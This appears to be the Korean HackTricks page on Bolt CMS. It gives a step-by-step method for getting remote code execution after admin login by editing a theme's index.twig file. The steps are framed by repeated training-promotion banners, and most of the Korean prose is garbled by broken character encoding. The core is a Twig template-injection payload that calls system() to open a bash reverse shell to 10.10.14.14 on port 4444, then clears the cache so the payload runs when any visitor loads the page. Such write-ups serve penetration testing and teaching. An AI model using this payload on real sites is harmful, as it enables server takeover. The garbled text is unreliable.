Bolt CMS
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
RCE
๊ด๋ฆฌ์๋ก ๋ก๊ทธ์ธํ ํ (/bot๋ก ์ด๋ํ์ฌ ๋ก๊ทธ์ธ ํ๋กฌํํธ์ ์ ๊ทผ), Bolt CMS์์ RCE๋ฅผ ์ป์ ์ ์์ต๋๋ค:
Configuration->View Configuration->Main Configuration์ ์ ํํ๊ฑฐ๋ URL ๊ฒฝ๋ก/bolt/file-edit/config?file=/bolt/config.yaml๋ก ์ด๋ํฉ๋๋ค.- ํ ๋ง์ ๊ฐ์ ํ์ธํฉ๋๋ค.
.png)
File management->View & edit templates๋ฅผ ์ ํํฉ๋๋ค.- ์ด์ ๋จ๊ณ์์ ์ฐพ์ ํ
๋ง ๊ธฐ๋ณธ๊ฐ(
base-2021์ธ ๊ฒฝ์ฐ)์ ์ ํํ๊ณindex.twig๋ฅผ ์ ํํฉ๋๋ค. - ์ ๊ฒฝ์ฐ์๋ URL ๊ฒฝ๋ก /bolt/file-edit/themes?file=/base-2021/index.twig์ ์์ต๋๋ค.
- template injection (Twig)๋ฅผ ํตํด ์ด ํ์ผ์ ํ์ด๋ก๋๋ฅผ ์ค์ ํฉ๋๋ค, ์:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}} - ๋ณ๊ฒฝ ์ฌํญ์ ์ ์ฅํฉ๋๋ค.
.png)
Maintenance->Clear the cache์์ ์บ์๋ฅผ ์ง์๋๋ค.- ์ผ๋ฐ ์ฌ์ฉ์๋ก ๋ค์ ํ์ด์ง์ ์ ๊ทผํ๋ฉด ํ์ด๋ก๋๊ฐ ์คํ๋์ด์ผ ํฉ๋๋ค.
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


